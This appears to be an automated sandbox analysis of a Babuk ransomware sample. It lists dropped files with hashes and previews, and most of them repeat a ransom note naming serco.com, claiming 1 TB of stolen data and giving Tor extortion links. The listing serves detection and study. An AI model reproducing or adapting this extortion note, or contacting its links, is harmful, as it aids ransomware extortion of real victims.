                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.613187345459839
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlKKznRbhIiwpyF3eMYAFxkCxTsZcuwcsHSjxsaUCSmPQTiS2YmliLUxNvEEn:68n9hIiwcNXhTGc7JaazCxu2CL0vtn
                                                                            MD5:5B3BBEAE06FFD8CDA62352C67E62F615
                                                                            SHA1:572FC3E534426A19A3BB654149C62F3F566A1B39
                                                                            SHA-256:00E165BEA0DD57272D1748CFE4F01B4B4A2481D950279D6614B3864344775586
                                                                            SHA-512:ABD5B9A90554C09B0EAC1B2B1F26BBF19DBF4E6BAA23AACEF862EAB2ABECFAF16B01E1D9C7BA0EF0C42FB69618AA9B36012CA21723A7096F9DB430FD1FC7FA12
                                                                            Malicious:false
                                                                            Preview: .....:A.?....(..R.>...`............Pw..+...............\/.k%.K.;.f...."R.4(p...=k.....,.6!...B$...)...yW."....VJ......S...a.g....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.98244222172742
                                                                            Encrypted:false
                                                                            SSDEEP:192:9W1KLDd2L866wvJzZK1Wj4pkLAX5M/hos9JIn9XuDEan:Y12ALpv+EjNLrhogSnxuN
                                                                            MD5:6B4891321D7BC03236C885F6F792A150
                                                                            SHA1:2F47A96776D2679289C666B23D580314A75E2484
                                                                            SHA-256:0DE59FCBABE8A736E2E9E5CB3F3EC4596F08FDFAF04E57435A97ABF5B4F3A32D
                                                                            SHA-512:8DC081E6DB4D213E092C676EB24DA96AD2840D5FA7077FC8E269AB0A708A9BC433F5B58125D823126D0B99EA4F717C707A0433558CF77750B8383F34ACA0C11E
                                                                            Malicious:false
                                                                            Preview: GP.xa.......N.T..v.i..?":.7........R.E.Q.|..k.Tn.....,...+@z^0.]h...@.....o.^l..szo.8...eb.(...p........h...+..h..=,..'.;D.w...u...)..vW....Nn.:.@....gL'.:m./.(I2%.j..L.Z..D....a..I.C...J....+....D/.h..W.8^.U......Wb.k.Y...M.b....,.21\..E.:....m.Bm....#40Xi..m1.L.....N.s.lRj.......r.....&...Wx....;...d.FJ.....G....E....$og....4K...3....c...&*..d.Y..{.d..q.@....q........Vn..2'.\.%.V....W.......(h`./.M...~..f....[../.:z..@.....e...j.h&.#)_...E.>..H.J.x.`....^..z..PC.W....d.g...pm.O............X...+....Uo..C%..l...$..]b.......Qel..7..9BO......s...(..r5I..0.a..(.@Gph..C....HS.Xq)..:.....3....................N.s../${...,..$@u`Y.V..8..r.AK..-...}5.q...`H...z.@Qs.J..o..*_...~..8^u.~..&`N!`.J>.i....O...I...]..k^`g.@a.....M.*a....C...l..:..?...L...2.... .....i.....c..^<.q(AU1L..N....c.......=z%....dg..3..>B.]..J7.^6)u...[....f,.C.G......1w..>..6/H..5Km:...=.....M.....4....(.l/.x....=H....z*.....z.......]...o..f...k`......8..Uw.*....j.2.Bf...8.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.427703658205494
                                                                            Encrypted:false
